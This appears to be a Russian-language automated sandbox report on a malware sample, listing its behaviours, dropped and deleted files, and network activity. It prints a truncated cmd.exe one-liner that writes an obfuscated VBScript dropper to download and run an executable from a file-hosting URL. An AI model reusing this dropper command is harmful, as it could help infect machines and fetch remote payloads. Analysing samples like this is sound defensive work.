Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO C8g= "http://a.pomf.cat/pjjsag.exe">>N5o.VBS &@ECHO S9v = Z3i("V^i>UhU")>>N5o.VBS &@ECHO Set B7g = CreateObject(Z3i("]ch]\B>h]\Xdd`"))>>N5o.VBS &@ECHO B7g.Open Z3i("WUd"), ...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\n5o.vbs
Удаляет следующие файлы
- %TEMP%\n5o.vbs
Сетевая активность
Подключается к
- 'a.##mf.cat':80
TCP
Запросы HTTP GET
- http://a.##mf.cat/pjjsag.exe
UDP
- DNS ASK a.##mf.cat
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\N5o.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO C8g= "http://a.pomf.cat/pjjsag.exe">>N5o.VBS &@ECHO S9v = Z3i("V^i>UhU")>>N5o.VBS &@ECHO Set B7g = CreateObject(Z3i("]ch]\B>h]\Xdd`"))>>N5o.VBS &@ECHO B7g.Open Z3i("WUd"), ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\timeout.exe' 13
